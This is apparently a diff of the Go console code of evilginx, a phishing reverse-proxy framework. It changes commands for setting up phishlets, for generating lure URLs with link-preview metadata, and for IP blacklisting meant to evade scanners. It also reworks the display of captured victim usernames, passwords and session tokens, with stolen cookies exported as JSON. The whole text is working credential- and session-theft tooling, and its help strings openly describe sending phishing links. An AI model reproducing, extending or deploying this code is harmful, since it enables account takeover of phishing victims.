vals := []string{t.cfg.general.Domain, t.cfg.general.Ipv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.RedirectUrl}
|
||||
log.Printf("\n%s\n", AsRows(keys, vals))
|
||||
return nil
|
||||
} else if pn == 2 {
|
||||
@ -196,22 +190,11 @@ func (t *Terminal) handleConfig(args []string) error {
|
||||
case "domain":
|
||||
t.cfg.SetBaseDomain(args[1])
|
||||
t.cfg.ResetAllSites()
|
||||
t.manageCertificates(false)
|
||||
return nil
|
||||
case "ip":
|
||||
case "ipv4":
|
||||
t.cfg.SetServerIP(args[1])
|
||||
return nil
|
||||
case "redirect_key":
|
||||
t.cfg.SetRedirectParam(args[1])
|
||||
log.Warning("you need to regenerate your phishing urls after this change")
|
||||
return nil
|
||||
case "verification_key":
|
||||
t.cfg.SetVerificationParam(args[1])
|
||||
log.Warning("you need to regenerate your phishing urls after this change")
|
||||
return nil
|
||||
case "verification_token":
|
||||
t.cfg.SetVerificationToken(args[1])
|
||||
log.Warning("you need to regenerate your phishing urls after this change")
|
||||
return nil
|
||||
case "redirect_url":
|
||||
if len(args[1]) > 0 {
|
||||
_, err := url.ParseRequestURI(args[1])
|
||||
@ -230,7 +213,10 @@ func (t *Terminal) handleBlacklist(args []string) error {
|
||||
pn := len(args)
|
||||
if pn == 0 {
|
||||
mode := t.cfg.GetBlacklistMode()
|
||||
ip_num, mask_num := t.p.bl.GetStats()
|
||||
log.Info("blacklist mode set to: %s", mode)
|
||||
log.Info("blacklist: loaded %d ip addresses and %d ip masks", ip_num, mask_num)
|
||||
|
||||
return nil
|
||||
} else if pn == 1 {
|
||||
switch args[0] {
|
||||
@ -240,10 +226,27 @@ func (t *Terminal) handleBlacklist(args []string) error {
|
||||
case "unauth":
|
||||
t.cfg.SetBlacklistMode(args[0])
|
||||
return nil
|
||||
case "noadd":
|
||||
t.cfg.SetBlacklistMode(args[0])
|
||||
return nil
|
||||
case "off":
|
||||
t.cfg.SetBlacklistMode(args[0])
|
||||
return nil
|
||||
}
|
||||
} else if pn == 2 {
|
||||
switch args[0] {
|
||||
case "log":
|
||||
switch args[1] {
|
||||
case "on":
|
||||
t.p.bl.SetVerbose(true)
|
||||
log.Info("blacklist log output: enabled")
|
||||
return nil
|
||||
case "off":
|
||||
t.p.bl.SetVerbose(false)
|
||||
log.Info("blacklist log output: disabled")
|
||||
return nil
|
||||
}
|
||||
}
|
||||
}
|
||||
return fmt.Errorf("invalid syntax: %s", args)
|
||||
}
|
||||
@ -252,18 +255,18 @@ func (t *Terminal) handleProxy(args []string) error {
|
||||
pn := len(args)
|
||||
if pn == 0 {
|
||||
var proxy_enabled string = "no"
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
proxy_enabled = "yes"
|
||||
}
|
||||
|
||||
keys := []string{"enabled", "type", "address", "port", "username", "password"}
|
||||
vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, t.cfg.proxyPassword}
|
||||
vals := []string{proxy_enabled, t.cfg.proxyConfig.Type, t.cfg.proxyConfig.Address, strconv.Itoa(t.cfg.proxyConfig.Port), t.cfg.proxyConfig.Username, t.cfg.proxyConfig.Password}
|
||||
log.Printf("\n%s\n", AsRows(keys, vals))
|
||||
return nil
|
||||
} else if pn == 1 {
|
||||
switch args[0] {
|
||||
case "enable":
|
||||
err := t.p.setProxy(true, t.p.cfg.proxyType, t.p.cfg.proxyAddress, t.p.cfg.proxyPort, t.p.cfg.proxyUsername, t.p.cfg.proxyPassword)
|
||||
err := t.p.setProxy(true, t.p.cfg.proxyConfig.Type, t.p.cfg.proxyConfig.Address, t.p.cfg.proxyConfig.Port, t.p.cfg.proxyConfig.Username, t.p.cfg.proxyConfig.Password)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -271,7 +274,7 @@ func (t *Terminal) handleProxy(args []string) error {
|
||||
log.Important("you need to restart evilginx for the changes to take effect!")
|
||||
return nil
|
||||
case "disable":
|
||||
err := t.p.setProxy(false, t.p.cfg.proxyType, t.p.cfg.proxyAddress, t.p.cfg.proxyPort, t.p.cfg.proxyUsername, t.p.cfg.proxyPassword)
|
||||
err := t.p.setProxy(false, t.p.cfg.proxyConfig.Type, t.p.cfg.proxyConfig.Address, t.p.cfg.proxyConfig.Port, t.p.cfg.proxyConfig.Username, t.p.cfg.proxyConfig.Password)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -281,19 +284,19 @@ func (t *Terminal) handleProxy(args []string) error {
|
||||
} else if pn == 2 {
|
||||
switch args[0] {
|
||||
case "type":
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
return fmt.Errorf("please disable the proxy before making changes to its configuration")
|
||||
}
|
||||
t.cfg.SetProxyType(args[1])
|
||||
return nil
|
||||
case "address":
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
return fmt.Errorf("please disable the proxy before making changes to its configuration")
|
||||
}
|
||||
t.cfg.SetProxyAddress(args[1])
|
||||
return nil
|
||||
case "port":
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
return fmt.Errorf("please disable the proxy before making changes to its configuration")
|
||||
}
|
||||
port, err := strconv.Atoi(args[1])
|
||||
@ -303,13 +306,13 @@ func (t *Terminal) handleProxy(args []string) error {
|
||||
t.cfg.SetProxyPort(port)
|
||||
return nil
|
||||
case "username":
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
return fmt.Errorf("please disable the proxy before making changes to its configuration")
|
||||
}
|
||||
t.cfg.SetProxyUsername(args[1])
|
||||
return nil
|
||||
case "password":
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
return fmt.Errorf("please disable the proxy before making changes to its configuration")
|
||||
}
|
||||
t.cfg.SetProxyPassword(args[1])
|
||||
@ -324,8 +327,10 @@ func (t *Terminal) handleSessions(args []string) error {
|
||||
dgray := color.New(color.FgHiBlack)
|
||||
lgreen := color.New(color.FgHiGreen)
|
||||
yellow := color.New(color.FgYellow)
|
||||
lyellow := color.New(color.FgHiYellow)
|
||||
lred := color.New(color.FgHiRed)
|
||||
cyan := color.New(color.FgCyan)
|
||||
white := color.New(color.FgHiWhite)
|
||||
|
||||
pn := len(args)
|
||||
if pn == 0 {
|
||||
@ -341,7 +346,7 @@ func (t *Terminal) handleSessions(args []string) error {
|
||||
var rows [][]string
|
||||
for _, s := range sessions {
|
||||
tcol := dgray.Sprintf("none")
|
||||
if len(s.Tokens) > 0 {
|
||||
if len(s.CookieTokens) > 0 || len(s.BodyTokens) > 0 || len(s.HttpTokens) > 0 {
|
||||
tcol = lgreen.Sprintf("captured")
|
||||
}
|
||||
row := []string{strconv.Itoa(s.Id), lred.Sprintf(s.Phishlet), lblue.Sprintf(truncateString(s.Username, 24)), lblue.Sprintf(truncateString(s.Password, 24)), tcol, yellow.Sprintf(s.RemoteAddr), time.Unix(s.UpdateTime, 0).Format("2006-01-02 15:04")}
|
||||
@ -373,13 +378,13 @@ func (t *Terminal) handleSessions(args []string) error {
|
||||
|
||||
s_found = true
|
||||
tcol := dgray.Sprintf("empty")
|
||||
if len(s.Tokens) > 0 {
|
||||
if len(s.CookieTokens) > 0 || len(s.BodyTokens) > 0 || len(s.HttpTokens) > 0 {
|
||||
tcol = lgreen.Sprintf("captured")
|
||||
}
|
||||
|
||||
keys := []string{"id", "phishlet", "username", "password", "tokens", "landing url", "user-agent", "remote ip", "create time", "update time"}
|
||||
vals := []string{strconv.Itoa(s.Id), lred.Sprint(s.Phishlet), lblue.Sprint(s.Username), lblue.Sprint(s.Password), tcol, yellow.Sprint(s.LandingURL), dgray.Sprint(s.UserAgent), yellow.Sprint(s.RemoteAddr), dgray.Sprint(time.Unix(s.CreateTime, 0).Format("2006-01-02 15:04")), dgray.Sprint(time.Unix(s.UpdateTime, 0).Format("2006-01-02 15:04"))}
|
||||
log.Printf("\n%s", AsRows(keys, vals))
|
||||
log.Printf("\n%s\n", AsRows(keys, vals))
|
||||
|
||||
if len(s.Custom) > 0 {
|
||||
var ckeys []string = []string{"custom", "value"}
|
||||
@ -387,14 +392,31 @@ func (t *Terminal) handleSessions(args []string) error {
|
||||
for k, v := range s.Custom {
|
||||
cvals = append(cvals, []string{dgray.Sprint(k), cyan.Sprint(v)})
|
||||
}
|
||||
log.Printf("\n%s", AsTable(ckeys, cvals))
|
||||
log.Printf("%s\n", AsTable(ckeys, cvals))
|
||||
}
|
||||
|
||||
if len(s.Tokens) > 0 {
|
||||
json_tokens := t.tokensToJSON(pl, s.Tokens)
|
||||
t.output("%s\n", json_tokens)
|
||||
} else {
|
||||
t.output("\n")
|
||||
if len(s.CookieTokens) > 0 || len(s.BodyTokens) > 0 || len(s.HttpTokens) > 0 {
|
||||
if len(s.BodyTokens) > 0 || len(s.HttpTokens) > 0 {
|
||||
//var str_tokens string
|
||||
|
||||
tkeys := []string{}
|
||||
tvals := []string{}
|
||||
|
||||
for k, v := range s.BodyTokens {
|
||||
tkeys = append(tkeys, k)
|
||||
tvals = append(tvals, white.Sprint(v))
|
||||
}
|
||||
for k, v := range s.HttpTokens {
|
||||
tkeys = append(tkeys, k)
|
||||
tvals = append(tvals, white.Sprint(v))
|
||||
}
|
||||
|
||||
log.Printf("[ %s ]\n%s\n", lgreen.Sprint("tokens"), AsRows(tkeys, tvals))
|
||||
}
|
||||
if len(s.CookieTokens) > 0 {
|
||||
json_tokens := t.cookieTokensToJSON(pl, s.CookieTokens)
|
||||
log.Printf("[ %s ]\n%s\n\n", lyellow.Sprint("cookies"), json_tokens)
|
||||
}
|
||||
}
|
||||
break
|
||||
}
|
||||
@ -473,32 +495,85 @@ func (t *Terminal) handleSessions(args []string) error {
|
||||
func (t *Terminal) handlePhishlets(args []string) error {
|
||||
pn := len(args)
|
||||
|
||||
if pn == 0 {
|
||||
if pn >= 3 && args[0] == "create" {
|
||||
pl, err := t.cfg.GetPhishlet(args[1])
|
||||
if err == nil {
|
||||
params := make(map[string]string)
|
||||
|
||||
var create_ok bool = true
|
||||
if pl.isTemplate {
|
||||
for n := 3; n < pn; n++ {
|
||||
val := args[n]
|
||||
|
||||
sp := strings.Index(val, "=")
|
||||
if sp == -1 {
|
||||
return fmt.Errorf("set custom parameters for the child phishlet using format 'param1=value1 param2=value2'")
|
||||
}
|
||||
k := val[:sp]
|
||||
v := val[sp+1:]
|
||||
|
||||
params[k] = v
|
||||
|
||||
log.Info("adding parameter: %s='%s'", k, v)
|
||||
}
|
||||
}
|
||||
|
||||
if create_ok {
|
||||
child_name := args[1] + ":" + args[2]
|
||||
err := t.cfg.AddSubPhishlet(child_name, args[1], params)
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
} else {
|
||||
t.cfg.SaveSubPhishlets()
|
||||
log.Info("created child phishlet: %s", child_name)
|
||||
}
|
||||
}
|
||||
return nil
|
||||
} else {
|
||||
log.Error("%v", err)
|
||||
}
|
||||
} else if pn == 0 {
|
||||
t.output("%s", t.sprintPhishletStatus(""))
|
||||
return nil
|
||||
} else if pn == 1 {
|
||||
_, err := t.cfg.GetPhishlet(args[0])
|
||||
if err == nil {
|
||||
t.output("%s", t.sprintPhishletStatus(args[0]))
|
||||
return nil
|
||||
}
|
||||
} else if pn == 2 {
|
||||
switch args[0] {
|
||||
case "delete":
|
||||
err := t.cfg.DeleteSubPhishlet(args[1])
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
return nil
|
||||
}
|
||||
t.cfg.SaveSubPhishlets()
|
||||
log.Info("deleted child phishlet: %s", args[1])
|
||||
return nil
|
||||
case "enable":
|
||||
_, err := t.cfg.GetPhishlet(args[1])
|
||||
pl, err := t.cfg.GetPhishlet(args[1])
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
break
|
||||
}
|
||||
domain, _ := t.cfg.GetSiteDomain(args[1])
|
||||
if domain == "" {
|
||||
return fmt.Errorf("you need to set hostname for phishlet '%s', first. type: phishlet hostname %s your.hostame.domain.com", args[1], args[1])
|
||||
if pl.isTemplate {
|
||||
return fmt.Errorf("phishlet '%s' is a template - you have to 'create' child phishlet from it, with predefined parameters, before you can enable it.", args[1])
|
||||
}
|
||||
err = t.cfg.SetSiteEnabled(args[1])
|
||||
if err != nil {
|
||||
t.cfg.SetSiteDisabled(args[1])
|
||||
return err
|
||||
}
|
||||
t.updatePhishletCertificates(args[1])
|
||||
t.manageCertificates(true)
|
||||
return nil
|
||||
case "disable":
|
||||
err := t.cfg.SetSiteDisabled(args[1])
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
t.manageCertificates(false)
|
||||
return nil
|
||||
case "hide":
|
||||
err := t.cfg.SetSiteHidden(args[1], true)
|
||||
@ -512,19 +587,17 @@ func (t *Terminal) handlePhishlets(args []string) error {
|
||||
return err
|
||||
}
|
||||
return nil
|
||||
case "get-url":
|
||||
return fmt.Errorf("incorrect number of arguments")
|
||||
case "get-hosts":
|
||||
pl, err := t.cfg.GetPhishlet(args[1])
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
bhost, ok := t.cfg.GetSiteDomain(pl.Site)
|
||||
bhost, ok := t.cfg.GetSiteDomain(pl.Name)
|
||||
if !ok || len(bhost) == 0 {
|
||||
return fmt.Errorf("no hostname set for phishlet '%s'", pl.Name)
|
||||
}
|
||||
out := ""
|
||||
hosts := pl.GetPhishHosts()
|
||||
hosts := pl.GetPhishHosts(false)
|
||||
for n, h := range hosts {
|
||||
if n > 0 {
|
||||
out += "\n"
|
||||
@ -543,34 +616,9 @@ func (t *Terminal) handlePhishlets(args []string) error {
|
||||
}
|
||||
if ok := t.cfg.SetSiteHostname(args[1], args[2]); ok {
|
||||
t.cfg.SetSiteDisabled(args[1])
|
||||
t.manageCertificates(false)
|
||||
}
|
||||
return nil
|
||||
case "get-url":
|
||||
pl, err := t.cfg.GetPhishlet(args[1])
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
bhost, ok := t.cfg.GetSiteDomain(pl.Site)
|
||||
if !ok || len(bhost) == 0 {
|
||||
return fmt.Errorf("no hostname set for phishlet '%s'", pl.Name)
|
||||
}
|
||||
urls, err := pl.GetLandingUrls(args[2], true)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
out := ""
|
||||
n := 0
|
||||
hblue := color.New(color.FgHiCyan)
|
||||
for _, u := range urls {
|
||||
if n > 0 {
|
||||
out += "\n"
|
||||
}
|
||||
out += hblue.Sprint(u)
|
||||
n += 1
|
||||
}
|
||||
log.Warning("`get-url` is deprecated - please use `lures` with custom `path` instead")
|
||||
t.output("%s\n", out)
|
||||
return nil
|
||||
}
|
||||
}
|
||||
return fmt.Errorf("invalid syntax: %s", args)
|
||||
@ -624,7 +672,7 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
if err != nil {
|
||||
return fmt.Errorf("get-url: %v", err)
|
||||
}
|
||||
bhost, ok := t.cfg.GetSiteDomain(pl.Site)
|
||||
bhost, ok := t.cfg.GetSiteDomain(pl.Name)
|
||||
if !ok || len(bhost) == 0 {
|
||||
return fmt.Errorf("no hostname set for phishlet '%s'", pl.Name)
|
||||
}
|
||||
@ -747,19 +795,17 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
if val != "" {
|
||||
val = strings.ToLower(val)
|
||||
|
||||
if val != t.cfg.baseDomain && !strings.HasSuffix(val, "."+t.cfg.baseDomain) {
|
||||
return fmt.Errorf("edit: lure hostname must end with the base domain '%s'", t.cfg.baseDomain)
|
||||
if val != t.cfg.general.Domain && !strings.HasSuffix(val, "."+t.cfg.general.Domain) {
|
||||
return fmt.Errorf("edit: lure hostname must end with the base domain '%s'", t.cfg.general.Domain)
|
||||
}
|
||||
host_re := regexp.MustCompile(`^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$`)
|
||||
if !host_re.MatchString(val) {
|
||||
return fmt.Errorf("edit: invalid hostname")
|
||||
}
|
||||
err = t.updateHostCertificate(val)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
l.Hostname = val
|
||||
t.cfg.refreshActiveHostnames()
|
||||
t.manageCertificates(true)
|
||||
} else {
|
||||
l.Hostname = ""
|
||||
}
|
||||
@ -845,24 +891,24 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
}
|
||||
do_update = true
|
||||
log.Info("og_url = '%s'", l.OgUrl)
|
||||
case "template":
|
||||
case "redirector":
|
||||
if val != "" {
|
||||
path := val
|
||||
if !filepath.IsAbs(val) {
|
||||
templates_dir := t.cfg.GetTemplatesDir()
|
||||
path = filepath.Join(templates_dir, val)
|
||||
redirectors_dir := t.cfg.GetRedirectorsDir()
|
||||
path = filepath.Join(redirectors_dir, val)
|
||||
}
|
||||
|
||||
if _, err := os.Stat(path); !os.IsNotExist(err) {
|
||||
l.Template = val
|
||||
l.Redirector = val
|
||||
} else {
|
||||
return fmt.Errorf("edit: template file does not exist: %s", path)
|
||||
return fmt.Errorf("edit: redirector directory does not exist: %s", path)
|
||||
}
|
||||
} else {
|
||||
l.Template = ""
|
||||
l.Redirector = ""
|
||||
}
|
||||
do_update = true
|
||||
log.Info("template = '%s'", l.Template)
|
||||
log.Info("redirector = '%s'", l.Redirector)
|
||||
case "ua_filter":
|
||||
if val != "" {
|
||||
if _, err := regexp.Compile(val); err != nil {
|
||||
@ -893,7 +939,7 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
}
|
||||
if args[1] == "all" {
|
||||
di := []int{}
|
||||
for n, _ := range t.cfg.lures {
|
||||
for n := range t.cfg.lures {
|
||||
di = append(di, n)
|
||||
}
|
||||
if len(di) > 0 {
|
||||
@ -949,8 +995,8 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
return err
|
||||
}
|
||||
|
||||
keys := []string{"phishlet", "hostname", "path", "template", "ua_filter", "redirect_url", "info", "og_title", "og_desc", "og_image", "og_url"}
|
||||
vals := []string{hiblue.Sprint(l.Phishlet), cyan.Sprint(l.Hostname), hcyan.Sprint(l.Path), white.Sprint(l.Template), green.Sprint(l.UserAgentFilter), yellow.Sprint(l.RedirectUrl), l.Info, dgray.Sprint(l.OgTitle), dgray.Sprint(l.OgDescription), dgray.Sprint(l.OgImageUrl), dgray.Sprint(l.OgUrl)}
|
||||
keys := []string{"phishlet", "hostname", "path", "redirector", "ua_filter", "redirect_url", "info", "og_title", "og_desc", "og_image", "og_url"}
|
||||
vals := []string{hiblue.Sprint(l.Phishlet), cyan.Sprint(l.Hostname), hcyan.Sprint(l.Path), white.Sprint(l.Redirector), green.Sprint(l.UserAgentFilter), yellow.Sprint(l.RedirectUrl), l.Info, dgray.Sprint(l.OgTitle), dgray.Sprint(l.OgDescription), dgray.Sprint(l.OgImageUrl), dgray.Sprint(l.OgUrl)}
|
||||
log.Printf("\n%s\n", AsRows(keys, vals))
|
||||
|
||||
return nil
|
||||
@ -963,13 +1009,10 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
func (t *Terminal) createHelp() {
|
||||
h, _ := NewHelp()
|
||||
h.AddCommand("config", "general", "manage general configuration", "Shows values of all configuration variables and allows to change them.", LAYER_TOP,
|
||||
readline.PcItem("config", readline.PcItem("domain"), readline.PcItem("ip"), readline.PcItem("redirect_key"), readline.PcItem("verification_key"), readline.PcItem("verification_token"), readline.PcItem("redirect_url")))
|
||||
readline.PcItem("config", readline.PcItem("domain"), readline.PcItem("ipv4"), readline.PcItem("redirect_url")))
|
||||
h.AddSubCommand("config", nil, "", "show all configuration variables")
|
||||
h.AddSubCommand("config", []string{"domain"}, "domain <domain>", "set base domain for all phishlets (e.g. evilsite.com)")
|
||||
h.AddSubCommand("config", []string{"ip"}, "ip <ip_address>", "set ip address of the current server")
|
||||
h.AddSubCommand("config", []string{"redirect_key"}, "redirect_key <name>", "change name of the redirect parameter in phishing url (phishing urls will need to be regenerated)")
|
||||
h.AddSubCommand("config", []string{"verification_key"}, "verification_key <name>", "change name of the verification parameter in phishing url (phishing urls will need to be regenerated)")
|
||||
h.AddSubCommand("config", []string{"verification_token"}, "verification_token <token>", "change the value of the verification token (phishing urls will need to be regenerated)")
|
||||
h.AddSubCommand("config", []string{"ipv4"}, "ipv4 <ip_address>", "set ipv4 external address of the current server")
|
||||
h.AddSubCommand("config", []string{"redirect_url"}, "redirect_url <url>", "change the url where all unauthorized requests will be redirected to (phishing urls will need to be regenerated)")
|
||||
|
||||
h.AddCommand("proxy", "general", "manage proxy configuration", "Configures proxy which will be used to proxy the connection to remote website", LAYER_TOP,
|
||||
@ -984,16 +1027,19 @@ func (t *Terminal) createHelp() {
|
||||
h.AddSubCommand("proxy", []string{"password"}, "password <password>", "set proxy authentication password")
|
||||
|
||||
h.AddCommand("phishlets", "general", "manage phishlets configuration", "Shows status of all available phishlets and allows to change their parameters and enabled status.", LAYER_TOP,
|
||||
readline.PcItem("phishlets", readline.PcItem("hostname", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("enable", readline.PcItemDynamic(t.phishletPrefixCompleter)),
|
||||
readline.PcItem("phishlets", readline.PcItem("create", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("delete", readline.PcItemDynamic(t.phishletPrefixCompleter)),
|
||||
readline.PcItem("hostname", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("enable", readline.PcItemDynamic(t.phishletPrefixCompleter)),
|
||||
readline.PcItem("disable", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("hide", readline.PcItemDynamic(t.phishletPrefixCompleter)),
|
||||
readline.PcItem("unhide", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-url", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-hosts", readline.PcItemDynamic(t.phishletPrefixCompleter))))
|
||||
readline.PcItem("unhide", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-hosts", readline.PcItemDynamic(t.phishletPrefixCompleter))))
|
||||
h.AddSubCommand("phishlets", nil, "", "show status of all available phishlets")
|
||||
h.AddSubCommand("phishlets", nil, "<phishlet>", "show details of a specific phishlets")
|
||||
h.AddSubCommand("phishlets", []string{"create"}, "create <phishlet> <child_name> <key1=value1> <key2=value2>", "create child phishlet from a template phishlet with custom parameters")
|
||||
h.AddSubCommand("phishlets", []string{"delete"}, "delete <phishlet>", "delete child phishlet")
|
||||
h.AddSubCommand("phishlets", []string{"hostname"}, "hostname <phishlet> <hostname>", "set hostname for given phishlet (e.g. this.is.not.a.phishing.site.evilsite.com)")
|
||||
h.AddSubCommand("phishlets", []string{"enable"}, "enable <phishlet>", "enables phishlet and requests ssl/tls certificate if needed")
|
||||
h.AddSubCommand("phishlets", []string{"disable"}, "disable <phishlet>", "disables phishlet")
|
||||
h.AddSubCommand("phishlets", []string{"hide"}, "hide <phishlet>", "hides the phishing page, logging and redirecting all requests to it (good for avoiding scanners when sending out phishing links)")
|
||||
h.AddSubCommand("phishlets", []string{"unhide"}, "unhide <phishlet>", "makes the phishing page available and reachable from the outside")
|
||||
h.AddSubCommand("phishlets", []string{"get-url"}, "get-url <phishlet> <redirect_url>", "generates phishing url with redirection on successful authentication")
|
||||
h.AddSubCommand("phishlets", []string{"get-hosts"}, "get-hosts <phishlet>", "generates entries for hosts file in order to use localhost for testing")
|
||||
|
||||
h.AddCommand("sessions", "general", "manage sessions and captured tokens with credentials", "Shows all captured credentials and authentication tokens. Allows to view full history of visits and delete logged sessions.", LAYER_TOP,
|
||||
@ -1004,11 +1050,8 @@ func (t *Terminal) createHelp() {
|
||||
h.AddSubCommand("sessions", []string{"delete", "all"}, "delete all", "delete all logged sessions")
|
||||
|
||||
h.AddCommand("lures", "general", "manage lures for generation of phishing urls", "Shows all create lures and allows to edit or delete them.", LAYER_TOP,
|
||||
/* readline.PcItem("lures", readline.PcItem("create", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-url"),
|
||||
readline.PcItem("edit", readline.PcItem("hostname"), readline.PcItem("path"), readline.PcItem("redirect_url"), readline.PcItem("phishlet"), readline.PcItem("info"), readline.PcItem("og_title"), readline.PcItem("og_desc"), readline.PcItem("og_image"), readline.PcItem("og_url"), readline.PcItem("params"), readline.PcItem("template", readline.PcItemDynamic(t.emptyPrefixCompleter, readline.PcItemDynamic(t.templatesPrefixCompleter)))),
|
||||
readline.PcItem("delete", readline.PcItem("all"))))*/
|
||||
readline.PcItem("lures", readline.PcItem("create", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-url"),
|
||||
readline.PcItem("edit", readline.PcItemDynamic(t.luresIdPrefixCompleter, readline.PcItem("hostname"), readline.PcItem("path"), readline.PcItem("redirect_url"), readline.PcItem("phishlet"), readline.PcItem("info"), readline.PcItem("og_title"), readline.PcItem("og_desc"), readline.PcItem("og_image"), readline.PcItem("og_url"), readline.PcItem("params"), readline.PcItem("ua_filter"), readline.PcItem("template", readline.PcItemDynamic(t.templatesPrefixCompleter)))),
|
||||
readline.PcItem("edit", readline.PcItemDynamic(t.luresIdPrefixCompleter, readline.PcItem("hostname"), readline.PcItem("path"), readline.PcItem("redirect_url"), readline.PcItem("phishlet"), readline.PcItem("info"), readline.PcItem("og_title"), readline.PcItem("og_desc"), readline.PcItem("og_image"), readline.PcItem("og_url"), readline.PcItem("params"), readline.PcItem("ua_filter"), readline.PcItem("redirector", readline.PcItemDynamic(t.redirectorsPrefixCompleter)))),
|
||||
readline.PcItem("delete", readline.PcItem("all"))))
|
||||
|
||||
h.AddSubCommand("lures", nil, "", "show all create lures")
|
||||
@ -1020,7 +1063,7 @@ func (t *Terminal) createHelp() {
|
||||
h.AddSubCommand("lures", []string{"get-url"}, "get-url <id> import <params_file> export <urls_file> <text|csv|json>", "generates phishing urls, importing parameters from <import_path> file and exporting them to <export_path>")
|
||||
h.AddSubCommand("lures", []string{"edit", "hostname"}, "edit <id> hostname <hostname>", "sets custom phishing <hostname> for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "path"}, "edit <id> path <path>", "sets custom url <path> for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "template"}, "edit <id> template <path>", "sets an html template <path> for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "redirector"}, "edit <id> redirector <path>", "sets an html redirector directory <path> for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "ua_filter"}, "edit <id> ua_filter <regexp>", "sets a regular expression user-agent whitelist filter <regexp> for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "redirect_url"}, "edit <id> redirect_url <redirect_url>", "sets redirect url that user will be navigated to on successful authorization, for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "phishlet"}, "edit <id> phishlet <phishlet>", "change the phishlet, the lure with a given <id> applies to")
|
||||
@ -1031,12 +1074,17 @@ func (t *Terminal) createHelp() {
|
||||
h.AddSubCommand("lures", []string{"edit", "og_url"}, "edit <id> og_url <title>", "sets opengraph url that will be shown in link preview, for a lure with a given <id>")
|
||||
|
||||
h.AddCommand("blacklist", "general", "manage automatic blacklisting of requesting ip addresses", "Select what kind of requests should result in requesting IP addresses to be blacklisted.", LAYER_TOP,
|
||||
readline.PcItem("blacklist", readline.PcItem("all"), readline.PcItem("unauth"), readline.PcItem("off")))
|
||||
readline.PcItem("blacklist", readline.PcItem("all"), readline.PcItem("unauth"), readline.PcItem("noadd"), readline.PcItem("off"), readline.PcItem("log", readline.PcItem("on"), readline.PcItem("off"))))
|
||||
|
||||
h.AddSubCommand("blacklist", nil, "", "show current blacklisting mode")
|
||||
h.AddSubCommand("blacklist", []string{"all"}, "all", "block and blacklist ip addresses for every single request (even authorized ones!)")
|
||||
h.AddSubCommand("blacklist", []string{"unauth"}, "unauth", "block and blacklist ip addresses only for unauthorized requests")
|
||||
h.AddSubCommand("blacklist", []string{"off"}, "off", "never add any ip addresses to blacklist")
|
||||
h.AddSubCommand("blacklist", []string{"noadd"}, "noadd", "block but do not add new ip addresses to blacklist")
|
||||
h.AddSubCommand("blacklist", []string{"off"}, "off", "ignore blacklist and allow every request to go through")
|
||||
h.AddSubCommand("blacklist", []string{"log"}, "log <on|off>", "enable or disable log output for blacklist messages")
|
||||
|
||||
h.AddCommand("test-certs", "general", "test TLS certificates for active phishlets", "Test availability of set up TLS certificates for active phishlets.", LAYER_TOP,
|
||||
readline.PcItem("test-certs"))
|
||||
|
||||
h.AddCommand("clear", "general", "clears the screen", "Clears the screen.", LAYER_TOP,
|
||||
readline.PcItem("clear"))
|
||||
@ -1044,7 +1092,7 @@ func (t *Terminal) createHelp() {
|
||||
t.hlp = h
|
||||
}
|
||||
|
||||
func (t *Terminal) tokensToJSON(pl *Phishlet, tokens map[string]map[string]*database.Token) string {
|
||||
func (t *Terminal) cookieTokensToJSON(pl *Phishlet, tokens map[string]map[string]*database.CookieToken) string {
|
||||
type Cookie struct {
|
||||
Path string `json:"path"`
|
||||
Domain string `json:"domain"`
|
||||
@ -1083,104 +1131,118 @@ func (t *Terminal) tokensToJSON(pl *Phishlet, tokens map[string]map[string]*data
|
||||
return string(json)
|
||||
}
|
||||
|
||||
func (t *Terminal) tokensToJSON(pl *Phishlet, tokens map[string]string) string {
|
||||
var ret string
|
||||
white := color.New(color.FgHiWhite)
|
||||
for k, v := range tokens {
|
||||
